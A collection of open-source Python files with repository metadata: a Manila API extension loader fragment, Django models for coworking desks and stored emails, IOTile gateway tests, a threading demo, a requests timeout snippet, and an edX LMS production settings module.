# NOTE(Vek): Extensions aren't required to have
# controller extensions
continue
controller_exts.extend(get_ext_method())
return controller_exts
def _check_extension(self, extension):
"""Checks for required methods in extension objects."""
try:
LOG.debug('Ext name: %s', extension.name)
LOG.debug('Ext alias: %s', extension.alias)
LOG.debug('Ext description: %s',
' '.join(extension.__doc__.strip().split()))
LOG.debug('Ext updated: %s', extension.updated)
except AttributeError as ex:
LOG.exception(_LE("Exception loading extension: %s"),
six.text_type(ex))
return False
return True
def load_extension(self, ext_factory):
"""Execute an extension factory.
Loads an extension. The 'ext_factory' is the name of a
callable that will be imported and called with one
argument--the extension manager. The factory callable is
expected to call the register() method at least once.
"""
LOG.debug("Loading extension %s", ext_factory)
# Load the factory
factory = importutils.import_class(ext_factory)
# Call it
LOG.debug("Calling extension factory %s", ext_factory)
factory(self)
def _load_extensions(self):
"""Load extensions specified on the command line."""
extensions = list(self.cls_list)
# NOTE(thingee): Backwards compat for the old extension loader path.
# We can drop this post-grizzly in the H release.
old_contrib_path = ('manila.api.openstack.share.contrib.'
'standard_extensions')
new_contrib_path = 'manila.api.contrib.standard_extensions'
if old_contrib_path in extensions:
LOG.warning(_LW('osapi_share_extension is set to deprecated path: '
'%s.'),
old_contrib_path)
LOG.warning(_LW('Please set your flag or manila.conf settings for '
'osapi_share_extension to: %s.'), new_contrib_path)
extensions = [e.replace(old_contrib_path, new_contrib_path)
for e in extensions]
for ext_factory in extensions:
try:
self.load_extension(ext_factory)
except Exception as exc:
LOG.warning(_LW('Failed to load extension %(ext_factory)s: '
'%(exc)s.'),
{"ext_factory": ext_factory, "exc": exc})
class ControllerExtension(object):
"""Extend core controllers of manila OpenStack API.
Provide a way to extend existing manila OpenStack API core
controllers.
"""
def __init__(self, extension, collection, controller):
self.extension = extension
self.collection = collection
self.controller = controller
class ResourceExtension(object):
"""Add top level resources to the OpenStack API in manila."""
def __init__(self, collection, controller, parent=None,
collection_actions=None, member_actions=None,
custom_routes_fn=None):
if not collection_actions:
collection_actions = {}
if not member_actions:
member_actions = {}
self.collection = collection
self.controller = controller
self.parent = parent
self.collection_actions = collection_actions
self.member_actions = member_actions
self.custom_routes_fn = custom_routes_fn
def load_standard_extensions(ext_mgr, logger, path, package, ext_list=None):
"""Registers all standard API extensions."""
# Walk through all the modules in our directory...
our_dir = path[0]
for dirpath, dirnames, filenames in os.walk(our_dir):
# Compute the relative package name from the dirpath
relpath = os.path.relpath(dirpath, our_dir)
if relpath == '.':
relpkg = ''
else:
relpkg = '.%s' % '.'.join(relpath.split(os.sep))
# Now, consider each file in turn, only considering .py files
for fname in filenames:
root, ext = os.path.splitext(fname)
# Skip __init__ and anything that's not .py
if ext != '.py' or root == '__init__':
continue
# Try loading it
classname = "%s%s" % (root[0].upper(), root[1:])
classpath = ("%s%s.%s.%s" %
(package, relpkg, root, classname))
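            # e.g. a file 'foo_bar.py' yields classname 'Foo_bar' and a
            # classpath like '<package><relpkg>.foo_bar.Foo_bar'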
if ext_list is not None and classname not in ext_list:
logger.debug("Skipping extension: %s" % classpath)
continue
try:
ext_mgr.load_extension(classpath)
except Exception as exc:
logger.warning(_LW('Failed to load extension %(classpath)s: '
'%(exc)s.'),
{"classpath": classpath, "exc": exc})
# Now, let's consider any subdirectories we may have...
subdirs = []
for dname in dirnames:
# Skip it if it does not have __init__.py
if not os.path.exists(os.path.join(dirpath, dname,
'__init__.py')):
continue
# If it has extension(), delegate...
ext_name = ("%s%s.%s.extension" %
(package, relpkg, dname))
try:
ext = importutils.import_class(ext_name)
except ImportError:
# extension() doesn't exist on it, so we'll explore
# the directory for ourselves
subdirs.append(dname)
else:
try:
ext(ext_mgr)
except Exception as exc:
logger.warning(_LW('Failed to load extension '
'%(ext_name)s: %(exc)s.'),
{"ext_name": ext_name, "exc": exc})
# Update the list of directories we'll explore...
dirnames[:] = subdirs
def extension_authorizer(api_name, extension_name):
def authorize(context, target=None, action=None):
if target is None:
target = {'project_id': context.project_id,
'user_id': context.user_id}
if action is None:
act = '%s_extension:%s' % (api_name, extension_name)
else:
act = '%s_extension:%s:%s' % (api_name, extension_name, action)
manila.policy.enforce(context, act, target)
return authorize
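# For example, extension_authorizer('share', 'quotas') returns a callable
# that enforces the policy rule 'share_extension:quotas', or
# 'share_extension:quotas:<action>' when an action is passed.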
def soft_extension_authorizer(api_name, extension_name):
hard_authorize = extension_authorizer(api_name, extension_name)
def authorize(context):
try:
hard_authorize(context)
return True
except exception.NotAuthorized:
return False
return authorize
|
NetApp/manila
|
manila/api/extensions.py
|
Python
|
apache-2.0
| 12,101
|
from __future__ import unicode_literals
from django.db import models
class Company(models.Model):
user = models.ForeignKey('accounts.User',
related_name='companies')
name = models.CharField(max_length=100)
def __unicode__(self):
return self.name
class Location(models.Model):
company = models.ForeignKey('Company',
related_name='locations')
city = models.CharField(max_length=200)
total_desks = models.IntegerField(verbose_name='Total desks')
reserved_desks = models.IntegerField(verbose_name='Reserved desks')
price = models.DecimalField(verbose_name='Price per desk $',
max_digits=12, decimal_places=2)
def __unicode__(self):
return '%s' % (self.city)
@property
def free_desks(self):
return self.total_desks - self.reserved_desks
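# Example: a Location with total_desks=10 and reserved_desks=3 reports
# free_desks == 7.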
class Desk(models.Model):
owner = models.OneToOneField('accounts.User', related_name='desks',
null=True)
location = models.OneToOneField(Location, related_name='desks')
rent_start_date = models.DateTimeField(null=True)
rent_end_date = models.DateTimeField(null=True)
def __unicode__(self):
return '%s' % self.location
|
dook/coworkok
|
cowork/models.py
|
Python
|
gpl-3.0
| 1,209
|
#-*- coding: utf-8 -*-
from database_email_backend.fields import Base64Field
from django.db import models
class Email(models.Model):
sent_at = models.DateTimeField(auto_now_add=True)
from_email = models.CharField(blank=True, default='', max_length=255)
to_emails = models.TextField(blank=True, default='')
cc_emails = models.TextField(blank=True, default='')
bcc_emails = models.TextField(blank=True, default='')
all_recipients = models.TextField(blank=True, default='')
headers = models.TextField(blank=True, default='')
subject = models.TextField(blank=True, default='')
body = models.TextField(blank=True, default='')
raw = models.TextField(blank=True, default='')
def __unicode__(self):
return u'Email from "%s" to "%s" sent at %s about "%s"' % (self.from_email, self.to_emails,
self.sent_at, self.subject)
@property
def attachment_count(self):
if not hasattr(self, 'attachment_count_cache'):
self.attachment_count_cache = self.attachments.count()
return self.attachment_count_cache
class Attachment(models.Model):
email = models.ForeignKey(Email, related_name='attachments')
filename = models.CharField(max_length=255, null=True, blank=True, default=None)
content = Base64Field(null=True, blank=True, default=None)
mimetype = models.CharField(max_length=255, null=True, blank=True, default=None)
|
jbinary/django-database-email-backend
|
database_email_backend/models.py
|
Python
|
mit
| 1,478
|
import pytest
import queue
from iotile_transport_awsiot.mqtt_client import OrderedAWSIOTClient
import time
pytestmark = pytest.mark.skip("This distribution needs to be updated to work with asyncio gateway")
def test_gateway(gateway, local_broker, args):
"""Make sure we can connect to the gateway by sending packets over the mqtt message broker."""
client = OrderedAWSIOTClient(args)
client.connect('hello')
local_broker.expect(5)
client.publish('devices/d--0000-0000-0000-0002/control/probe', {'type': 'command', 'operation': 'probe', 'client': 'hello'})
local_broker.wait()
# There should be 1 command message, 1 response and 1 advertisement notification per device
assert len(local_broker.messages) == 5
assert 'devices/d--0000-0000-0000-0002/devices/d--0000-0000-0000-0001/data/advertisement' in local_broker.messages
assert 'devices/d--0000-0000-0000-0002/devices/d--0000-0000-0000-0003/data/advertisement' in local_broker.messages
assert 'devices/d--0000-0000-0000-0002/devices/d--0000-0000-0000-0004/data/advertisement' in local_broker.messages
assert 'devices/d--0000-0000-0000-0002/data/status' in local_broker.messages
assert 'devices/d--0000-0000-0000-0002/control/probe' in local_broker.messages
def test_probe(gateway, hw_man, local_broker):
"""Make sure we can probe for devices."""
local_broker.expect(3)
results = hw_man.scan(wait=0.1)
assert len(results) == 3
assert results[0]['uuid'] == 1
assert results[0]['connection_string'] == 'd--0000-0000-0000-0001'
assert results[1]['uuid'] == 3
assert results[1]['connection_string'] == 'd--0000-0000-0000-0003'
assert results[2]['uuid'] == 4
assert results[2]['connection_string'] == 'd--0000-0000-0000-0004'
def test_connect(gateway, hw_man, local_broker):
"""Make sure we can connect to a device."""
hw_man.scan(wait=0.1)
hw_man.connect(1)
hw_man.disconnect()
def test_streaming(gateway, hw_man, local_broker):
"""Make sure we can receive streamed data."""
hw_man.connect(3, wait=0.1)
hw_man.enable_streaming()
reps = hw_man.wait_reports(100, timeout=1.0)
assert len(reps) == 100
def test_tracing(gateway, hw_man, local_broker):
"""Make sure we can receive tracing data."""
hw_man.connect(4, wait=0.1)
hw_man.enable_tracing()
time.sleep(0.1)
data = hw_man.dump_trace('raw')
assert data == b'Hello world, this is tracing data!'
def test_rpcs(gateway, hw_man, local_broker):
"""Make sure we can send rpcs."""
hw_man.connect(3, wait=0.1)
hw_man.controller()
def test_script(gateway, hw_man, local_broker):
"""Make sure we can send scripts."""
script = bytearray(('ab'*10000).encode('utf-8'))
progs = queue.Queue()
hw_man.connect(3, wait=0.1)
gateway.agents[0].throttle_progress = 0.0
hw_man.stream._send_highspeed(script, lambda x, y: progs.put((x,y)))
last_done = -1
last_total = None
prog_count = 0
while not progs.empty():
done, total = progs.get(block=False)
assert done <= total
assert done >= last_done
if last_total is not None:
assert total == last_total
last_done = done
last_total = total
prog_count += 1
assert prog_count > 0
dev = gateway.device_manager.adapters[0]._adapter.devices[3]
assert dev.script == script
def test_script_chunking(gateway, hw_man, local_broker):
"""Make sure we can send scripts."""
script = bytearray(('a'*1024*80).encode('utf-8'))
progs = queue.Queue()
hw_man.connect(3, wait=0.1)
gateway.agents[0].throttle_progress = 0.0
hw_man.stream._send_highspeed(script, lambda x, y: progs.put((x, y)))
last_done = -1
last_total = None
prog_count = 0
while not progs.empty():
done, total = progs.get(block=False)
assert done <= total
assert done >= last_done
if last_total is not None:
assert total == last_total
last_done = done
last_total = total
prog_count += 1
assert prog_count > 0
dev = gateway.device_manager.adapters[0]._adapter.devices[3]
assert dev.script == script
def test_script_progress_throttling(gateway, hw_man, local_broker):
"""Make sure progress updates are properly throttled."""
script = bytearray(('a'*1024*80).encode('utf-8'))
progs = []
hw_man.connect(3, wait=0.1)
gateway.agents[0].throttle_progress = 10.0
hw_man.stream._send_highspeed(script, lambda x, y: progs.append((x, y)))
dev = gateway.device_manager.adapters[0]._adapter.devices[3]
assert dev.script == script
# This should happen faster than our throttling period so we should
# get exactly 2 progress updates, on start and on finish
assert len(progs) == 2
x, y = progs[0]
assert x == 0
x, y = progs[1]
assert x == y
def test_autodisconnect(gateway, hw_man, local_broker):
"""Make sure we autodisconnect clients."""
gateway.agents[0].client_timeout = 0.1
hw_man.connect(3, wait=0.1)
assert len(gateway.agents[0]._connections) == 1
time.sleep(1.5)
assert len(gateway.agents[0]._connections) == 0
assert hw_man.stream.connection_interrupted is True
# Make sure we can reconnect automatically
hw_man.controller()
assert len(gateway.agents[0]._connections) == 1
# Let us lapse again
time.sleep(1.5)
assert len(gateway.agents[0]._connections) == 0
# Return to our disconnected state
hw_man.disconnect()
# Make sure we can connect normally again
hw_man.connect(3, wait=0.1)
|
iotile/coretools
|
transport_plugins/awsiot/test/test_agent.py
|
Python
|
gpl-3.0
| 5,635
|
import threading
import time
class ThreadSkeleton(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)
    def run(self):
        print('a new thread---')
thread = ThreadSkeleton()
thread.start()
# time.sleep(2)
print('hello,thread---')
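# A hedged note (not in the original code): thread.join() would make the main
# thread wait for the worker to finish, instead of relying on a sleep():
#   thread.join()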
|
hushupei/PyCode
|
thread2.py
|
Python
|
gpl-3.0
| 247
|
#coding:utf-8
'''
Timeouts: set a timeout (in seconds) on a request.
requests.get('http://github.com', timeout=2)
'''
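# A minimal runnable sketch (not from the book text; the calls used are the
# standard requests API): catching the exception raised when the server does
# not respond within the timeout.
import requests
try:
    requests.get('http://github.com', timeout=2)
except requests.exceptions.Timeout:
    print('request timed out after 2 seconds')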
|
qiyeboy/SpiderBook
|
ch03/3.2.3.7.py
|
Python
|
mit
| 91
|
"""
This is the default template for our main set of AWS servers. This does NOT
cover the content machines, which use content.py
Common traits:
* Use memcached, and cache-backed sessions
* Use a MySQL 5.1 database
"""
# We intentionally define lots of variables that aren't used, and
# want to import all variables from base settings files
# pylint: disable=wildcard-import, unused-wildcard-import
# Pylint gets confused by path.py instances, which report themselves as class
# objects. As a result, pylint applies the wrong regex in validating names,
# and throws spurious errors. Therefore, we disable invalid-name checking.
# pylint: disable=invalid-name
import json
from .common import *
from openedx.core.lib.logsettings import get_logger_config
import os
from path import path
from xmodule.modulestore.modulestore_settings import convert_module_store_setting_if_needed
# SERVICE_VARIANT specifies name of the variant used, which decides what JSON
# configuration files are read during startup.
SERVICE_VARIANT = os.environ.get('SERVICE_VARIANT', None)
# CONFIG_ROOT specifies the directory where the JSON configuration
# files are expected to be found. If not specified, use the project
# directory.
CONFIG_ROOT = path(os.environ.get('CONFIG_ROOT', ENV_ROOT))
# CONFIG_PREFIX specifies the prefix of the JSON configuration files,
# based on the service variant. If no variant is used, don't use a
# prefix.
CONFIG_PREFIX = SERVICE_VARIANT + "." if SERVICE_VARIANT else ""
################################ ALWAYS THE SAME ##############################
DEBUG = False
TEMPLATE_DEBUG = False
EMAIL_BACKEND = 'django_ses.SESBackend'
SESSION_ENGINE = 'django.contrib.sessions.backends.cache'
DEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'
# IMPORTANT: With this enabled, the server must always be behind a proxy that
# strips the header HTTP_X_FORWARDED_PROTO from client requests. Otherwise,
# a user can fool our server into thinking it was an https connection.
# See
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-proxy-ssl-header
# for other warnings.
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
###################################### CELERY ################################
# Don't use a connection pool, since connections are dropped by ELB.
BROKER_POOL_LIMIT = 0
BROKER_CONNECTION_TIMEOUT = 1
# For the Result Store, use the django cache named 'celery'
CELERY_RESULT_BACKEND = 'cache'
CELERY_CACHE_BACKEND = 'celery'
# When the broker is behind an ELB, use a heartbeat to refresh the
# connection and to detect if it has been dropped.
BROKER_HEARTBEAT = 10.0
BROKER_HEARTBEAT_CHECKRATE = 2
# Each worker should only fetch one message at a time
CELERYD_PREFETCH_MULTIPLIER = 1
# Skip djcelery migrations, since we don't use the database as the broker
SOUTH_MIGRATION_MODULES = {
'djcelery': 'ignore',
}
# Rename the exchange and queues for each variant
QUEUE_VARIANT = CONFIG_PREFIX.lower()
CELERY_DEFAULT_EXCHANGE = 'edx.{0}core'.format(QUEUE_VARIANT)
HIGH_PRIORITY_QUEUE = 'edx.{0}core.high'.format(QUEUE_VARIANT)
DEFAULT_PRIORITY_QUEUE = 'edx.{0}core.default'.format(QUEUE_VARIANT)
LOW_PRIORITY_QUEUE = 'edx.{0}core.low'.format(QUEUE_VARIANT)
HIGH_MEM_QUEUE = 'edx.{0}core.high_mem'.format(QUEUE_VARIANT)
CELERY_DEFAULT_QUEUE = DEFAULT_PRIORITY_QUEUE
CELERY_DEFAULT_ROUTING_KEY = DEFAULT_PRIORITY_QUEUE
CELERY_QUEUES = {
HIGH_PRIORITY_QUEUE: {},
LOW_PRIORITY_QUEUE: {},
DEFAULT_PRIORITY_QUEUE: {},
HIGH_MEM_QUEUE: {},
}
# If we're a worker on the high_mem queue, set ourselves to die after processing
# one request to avoid having memory leaks take down the worker server. This env
# var is set in /etc/init/edx-workers.conf -- this should probably be replaced
# with some celery API call to see what queue we started listening to, but I
# don't know what that call is or if it's active at this point in the code.
if os.environ.get('QUEUE') == 'high_mem':
CELERYD_MAX_TASKS_PER_CHILD = 1
########################## NON-SECURE ENV CONFIG ##############################
# Things like server locations, ports, etc.
with open(CONFIG_ROOT / CONFIG_PREFIX + "env.json") as env_file:
ENV_TOKENS = json.load(env_file)
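# For example (hypothetical values): with SERVICE_VARIANT=lms this reads
# <CONFIG_ROOT>/lms.env.json; with no variant it reads <CONFIG_ROOT>/env.json.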
# STATIC_ROOT specifies the directory where static files are
# collected
STATIC_ROOT_BASE = ENV_TOKENS.get('STATIC_ROOT_BASE', None)
if STATIC_ROOT_BASE:
STATIC_ROOT = path(STATIC_ROOT_BASE)
# STATIC_URL_BASE specifies the base url to use for static files
STATIC_URL_BASE = ENV_TOKENS.get('STATIC_URL_BASE', None)
if STATIC_URL_BASE:
# collectstatic will fail if STATIC_URL is a unicode string
STATIC_URL = STATIC_URL_BASE.encode('ascii')
if not STATIC_URL.endswith("/"):
STATIC_URL += "/"
# MEDIA_ROOT specifies the directory where user-uploaded files are stored.
MEDIA_ROOT = ENV_TOKENS.get('MEDIA_ROOT', MEDIA_ROOT)
MEDIA_URL = ENV_TOKENS.get('MEDIA_URL', MEDIA_URL)
PLATFORM_NAME = ENV_TOKENS.get('PLATFORM_NAME', PLATFORM_NAME)
PLATFORM_TWITTER_ACCOUNT = ENV_TOKENS.get('PLATFORM_TWITTER_ACCOUNT', PLATFORM_TWITTER_ACCOUNT)
PLATFORM_FACEBOOK_ACCOUNT = ENV_TOKENS.get('PLATFORM_FACEBOOK_ACCOUNT', PLATFORM_FACEBOOK_ACCOUNT)
# Social media links for the page footer
SOCIAL_MEDIA_FOOTER_URLS = ENV_TOKENS.get('SOCIAL_MEDIA_FOOTER_URLS', SOCIAL_MEDIA_FOOTER_URLS)
# For displaying on the receipt. At Stanford PLATFORM_NAME != MERCHANT_NAME, but PLATFORM_NAME is a fine default
CC_MERCHANT_NAME = ENV_TOKENS.get('CC_MERCHANT_NAME', PLATFORM_NAME)
EMAIL_BACKEND = ENV_TOKENS.get('EMAIL_BACKEND', EMAIL_BACKEND)
EMAIL_FILE_PATH = ENV_TOKENS.get('EMAIL_FILE_PATH', None)
EMAIL_HOST = ENV_TOKENS.get('EMAIL_HOST', 'localhost') # django default is localhost
EMAIL_PORT = ENV_TOKENS.get('EMAIL_PORT', 25) # django default is 25
EMAIL_USE_TLS = ENV_TOKENS.get('EMAIL_USE_TLS', False) # django default is False
SITE_NAME = ENV_TOKENS['SITE_NAME']
HTTPS = ENV_TOKENS.get('HTTPS', HTTPS)
SESSION_ENGINE = ENV_TOKENS.get('SESSION_ENGINE', SESSION_ENGINE)
SESSION_COOKIE_DOMAIN = ENV_TOKENS.get('SESSION_COOKIE_DOMAIN')
SESSION_COOKIE_HTTPONLY = ENV_TOKENS.get('SESSION_COOKIE_HTTPONLY', True)
REGISTRATION_EXTRA_FIELDS = ENV_TOKENS.get('REGISTRATION_EXTRA_FIELDS', REGISTRATION_EXTRA_FIELDS)
SESSION_COOKIE_SECURE = ENV_TOKENS.get('SESSION_COOKIE_SECURE', SESSION_COOKIE_SECURE)
CMS_BASE = ENV_TOKENS.get('CMS_BASE', 'studio.edx.org')
# allow for environments to specify what cookie name our login subsystem should use
# this is to fix a bug regarding simultaneous logins between edx.org and edge.edx.org which can
# happen with some browsers (e.g. Firefox)
if ENV_TOKENS.get('SESSION_COOKIE_NAME', None):
    # NOTE: there's a bug in Python's cookie handling (http://bugs.python.org/issue18012) which necessitates this being a str()
SESSION_COOKIE_NAME = str(ENV_TOKENS.get('SESSION_COOKIE_NAME'))
BOOK_URL = ENV_TOKENS['BOOK_URL']
MEDIA_URL = ENV_TOKENS['MEDIA_URL']
LOG_DIR = ENV_TOKENS['LOG_DIR']
CACHES = ENV_TOKENS['CACHES']
# Cache used for location mapping -- called many times with the same key/value
# in a given request.
if 'loc_cache' not in CACHES:
CACHES['loc_cache'] = {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'edx_location_mem_cache',
}
# Email overrides
DEFAULT_FROM_EMAIL = ENV_TOKENS.get('DEFAULT_FROM_EMAIL', DEFAULT_FROM_EMAIL)
DEFAULT_FEEDBACK_EMAIL = ENV_TOKENS.get('DEFAULT_FEEDBACK_EMAIL', DEFAULT_FEEDBACK_EMAIL)
ADMINS = ENV_TOKENS.get('ADMINS', ADMINS)
SERVER_EMAIL = ENV_TOKENS.get('SERVER_EMAIL', SERVER_EMAIL)
TECH_SUPPORT_EMAIL = ENV_TOKENS.get('TECH_SUPPORT_EMAIL', TECH_SUPPORT_EMAIL)
CONTACT_EMAIL = ENV_TOKENS.get('CONTACT_EMAIL', CONTACT_EMAIL)
BUGS_EMAIL = ENV_TOKENS.get('BUGS_EMAIL', BUGS_EMAIL)
PAYMENT_SUPPORT_EMAIL = ENV_TOKENS.get('PAYMENT_SUPPORT_EMAIL', PAYMENT_SUPPORT_EMAIL)
FINANCE_EMAIL = ENV_TOKENS.get('FINANCE_EMAIL', FINANCE_EMAIL)
UNIVERSITY_EMAIL = ENV_TOKENS.get('UNIVERSITY_EMAIL', UNIVERSITY_EMAIL)
PRESS_EMAIL = ENV_TOKENS.get('PRESS_EMAIL', PRESS_EMAIL)
# Currency
PAID_COURSE_REGISTRATION_CURRENCY = ENV_TOKENS.get('PAID_COURSE_REGISTRATION_CURRENCY',
PAID_COURSE_REGISTRATION_CURRENCY)
# Payment Report Settings
PAYMENT_REPORT_GENERATOR_GROUP = ENV_TOKENS.get('PAYMENT_REPORT_GENERATOR_GROUP', PAYMENT_REPORT_GENERATOR_GROUP)
# Bulk Email overrides
BULK_EMAIL_DEFAULT_FROM_EMAIL = ENV_TOKENS.get('BULK_EMAIL_DEFAULT_FROM_EMAIL', BULK_EMAIL_DEFAULT_FROM_EMAIL)
BULK_EMAIL_EMAILS_PER_TASK = ENV_TOKENS.get('BULK_EMAIL_EMAILS_PER_TASK', BULK_EMAIL_EMAILS_PER_TASK)
BULK_EMAIL_DEFAULT_RETRY_DELAY = ENV_TOKENS.get('BULK_EMAIL_DEFAULT_RETRY_DELAY', BULK_EMAIL_DEFAULT_RETRY_DELAY)
BULK_EMAIL_MAX_RETRIES = ENV_TOKENS.get('BULK_EMAIL_MAX_RETRIES', BULK_EMAIL_MAX_RETRIES)
BULK_EMAIL_INFINITE_RETRY_CAP = ENV_TOKENS.get('BULK_EMAIL_INFINITE_RETRY_CAP', BULK_EMAIL_INFINITE_RETRY_CAP)
BULK_EMAIL_LOG_SENT_EMAILS = ENV_TOKENS.get('BULK_EMAIL_LOG_SENT_EMAILS', BULK_EMAIL_LOG_SENT_EMAILS)
BULK_EMAIL_RETRY_DELAY_BETWEEN_SENDS = ENV_TOKENS.get('BULK_EMAIL_RETRY_DELAY_BETWEEN_SENDS', BULK_EMAIL_RETRY_DELAY_BETWEEN_SENDS)
# We want Bulk Email running on the high-priority queue, so we define the
# routing key that points to it. At the moment, the name is the same.
# We have to reset the value here, since we have changed the value of the queue name.
BULK_EMAIL_ROUTING_KEY = HIGH_PRIORITY_QUEUE
# We can run smaller jobs on the low priority queue. See note above for why
# we have to reset the value here.
BULK_EMAIL_ROUTING_KEY_SMALL_JOBS = LOW_PRIORITY_QUEUE
# Theme overrides
THEME_NAME = ENV_TOKENS.get('THEME_NAME', None)
# Marketing link overrides
MKTG_URL_LINK_MAP.update(ENV_TOKENS.get('MKTG_URL_LINK_MAP', {}))
# Mobile store URL overrides
MOBILE_STORE_URLS = ENV_TOKENS.get('MOBILE_STORE_URLS', MOBILE_STORE_URLS)
# Timezone overrides
TIME_ZONE = ENV_TOKENS.get('TIME_ZONE', TIME_ZONE)
# Translation overrides
LANGUAGES = ENV_TOKENS.get('LANGUAGES', LANGUAGES)
LANGUAGE_DICT = dict(LANGUAGES)
LANGUAGE_CODE = ENV_TOKENS.get('LANGUAGE_CODE', LANGUAGE_CODE)
USE_I18N = ENV_TOKENS.get('USE_I18N', USE_I18N)
# Additional installed apps
for app in ENV_TOKENS.get('ADDL_INSTALLED_APPS', []):
INSTALLED_APPS += (app,)
INSTALLED_APPS += (
'social.apps.django_app.default',
'django_extensions',
)
ENV_FEATURES = ENV_TOKENS.get('FEATURES', ENV_TOKENS.get('MITX_FEATURES', {}))
for feature, value in ENV_FEATURES.items():
FEATURES[feature] = value
WIKI_ENABLED = ENV_TOKENS.get('WIKI_ENABLED', WIKI_ENABLED)
local_loglevel = ENV_TOKENS.get('LOCAL_LOGLEVEL', 'INFO')
LOGGING = get_logger_config(LOG_DIR,
logging_env=ENV_TOKENS['LOGGING_ENV'],
local_loglevel=local_loglevel,
debug=False,
service_variant=SERVICE_VARIANT)
COURSE_LISTINGS = ENV_TOKENS.get('COURSE_LISTINGS', {})
SUBDOMAIN_BRANDING = ENV_TOKENS.get('SUBDOMAIN_BRANDING', {})
VIRTUAL_UNIVERSITIES = ENV_TOKENS.get('VIRTUAL_UNIVERSITIES', [])
META_UNIVERSITIES = ENV_TOKENS.get('META_UNIVERSITIES', {})
COMMENTS_SERVICE_URL = ENV_TOKENS.get("COMMENTS_SERVICE_URL", '')
COMMENTS_SERVICE_KEY = ENV_TOKENS.get("COMMENTS_SERVICE_KEY", '')
CERT_QUEUE = ENV_TOKENS.get("CERT_QUEUE", 'test-pull')
ZENDESK_URL = ENV_TOKENS.get("ZENDESK_URL")
FEEDBACK_SUBMISSION_EMAIL = ENV_TOKENS.get("FEEDBACK_SUBMISSION_EMAIL")
MKTG_URLS = ENV_TOKENS.get('MKTG_URLS', MKTG_URLS)
# git repo loading environment
GIT_REPO_DIR = ENV_TOKENS.get('GIT_REPO_DIR', '/edx/var/edxapp/course_repos')
GIT_IMPORT_STATIC = ENV_TOKENS.get('GIT_IMPORT_STATIC', True)
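# Merge CODE_JAIL overrides one level deep: dict-valued entries are updated
# key by key, while scalar entries are replaced outright.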
for name, value in ENV_TOKENS.get("CODE_JAIL", {}).items():
oldvalue = CODE_JAIL.get(name)
if isinstance(oldvalue, dict):
for subname, subvalue in value.items():
oldvalue[subname] = subvalue
else:
CODE_JAIL[name] = value
COURSES_WITH_UNSAFE_CODE = ENV_TOKENS.get("COURSES_WITH_UNSAFE_CODE", [])
ASSET_IGNORE_REGEX = ENV_TOKENS.get('ASSET_IGNORE_REGEX', ASSET_IGNORE_REGEX)
# Event Tracking
if "TRACKING_IGNORE_URL_PATTERNS" in ENV_TOKENS:
TRACKING_IGNORE_URL_PATTERNS = ENV_TOKENS.get("TRACKING_IGNORE_URL_PATTERNS")
# SSL external authentication settings
SSL_AUTH_EMAIL_DOMAIN = ENV_TOKENS.get("SSL_AUTH_EMAIL_DOMAIN", "MIT.EDU")
SSL_AUTH_DN_FORMAT_STRING = ENV_TOKENS.get("SSL_AUTH_DN_FORMAT_STRING",
"/C=US/ST=Massachusetts/O=Massachusetts Institute of Technology/OU=Client CA v1/CN={0}/emailAddress={1}")
# Django CAS external authentication settings
CAS_EXTRA_LOGIN_PARAMS = ENV_TOKENS.get("CAS_EXTRA_LOGIN_PARAMS", None)
if FEATURES.get('AUTH_USE_CAS'):
CAS_SERVER_URL = ENV_TOKENS.get("CAS_SERVER_URL", None)
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'django_cas.backends.CASBackend',
)
INSTALLED_APPS += ('django_cas',)
MIDDLEWARE_CLASSES += ('django_cas.middleware.CASMiddleware',)
CAS_ATTRIBUTE_CALLBACK = ENV_TOKENS.get('CAS_ATTRIBUTE_CALLBACK', None)
if CAS_ATTRIBUTE_CALLBACK:
import importlib
CAS_USER_DETAILS_RESOLVER = getattr(
importlib.import_module(CAS_ATTRIBUTE_CALLBACK['module']),
CAS_ATTRIBUTE_CALLBACK['function']
)
# Video Caching. Pairing country codes with CDN URLs.
# Example: {'CN': 'http://api.xuetangx.com/edx/video?s3_url='}
VIDEO_CDN_URL = ENV_TOKENS.get('VIDEO_CDN_URL', {})
############# CORS headers for cross-domain requests #################
if FEATURES.get('ENABLE_CORS_HEADERS') or FEATURES.get('ENABLE_CROSS_DOMAIN_CSRF_COOKIE'):
CORS_ALLOW_CREDENTIALS = True
CORS_ORIGIN_WHITELIST = ENV_TOKENS.get('CORS_ORIGIN_WHITELIST', ())
CORS_ORIGIN_ALLOW_ALL = ENV_TOKENS.get('CORS_ORIGIN_ALLOW_ALL', False)
CORS_ALLOW_INSECURE = ENV_TOKENS.get('CORS_ALLOW_INSECURE', False)
# If setting a cross-domain cookie, it's really important to choose
# a name for the cookie that is DIFFERENT than the cookies used
# by each subdomain. For example, suppose the applications
# at these subdomains are configured to use the following cookie names:
#
# 1) foo.example.com --> "csrftoken"
# 2) baz.example.com --> "csrftoken"
# 3) bar.example.com --> "csrftoken"
#
# For the cross-domain version of the CSRF cookie, you need to choose
# a name DIFFERENT than "csrftoken"; otherwise, the new token configured
# for ".example.com" could conflict with the other cookies,
# non-deterministically causing 403 responses.
#
# Because of the way Django stores cookies, the cookie name MUST
    # be a `str`, not unicode. Otherwise `TypeError`s will be raised
# when Django tries to call the unicode `translate()` method with the wrong
# number of parameters.
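    # For example (hypothetical value), env.json might set:
    #   "CROSS_DOMAIN_CSRF_COOKIE_NAME": "cross-domain-csrftoken"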
CROSS_DOMAIN_CSRF_COOKIE_NAME = str(ENV_TOKENS.get('CROSS_DOMAIN_CSRF_COOKIE_NAME'))
# When setting the domain for the "cross-domain" version of the CSRF
# cookie, you should choose something like: ".example.com"
# (note the leading dot), where both the referer and the host
# are subdomains of "example.com".
#
# Browser security rules require that
# the cookie domain matches the domain of the server; otherwise
# the cookie won't get set. And once the cookie gets set, the client
# needs to be on a domain that matches the cookie domain, otherwise
# the client won't be able to read the cookie.
CROSS_DOMAIN_CSRF_COOKIE_DOMAIN = ENV_TOKENS.get('CROSS_DOMAIN_CSRF_COOKIE_DOMAIN')
# Field overrides. To use the IDDE feature, add
# 'courseware.student_field_overrides.IndividualStudentOverrideProvider'.
FIELD_OVERRIDE_PROVIDERS = tuple(ENV_TOKENS.get('FIELD_OVERRIDE_PROVIDERS', []))
############################## SECURE AUTH ITEMS ###############
# Secret things: passwords, access keys, etc.
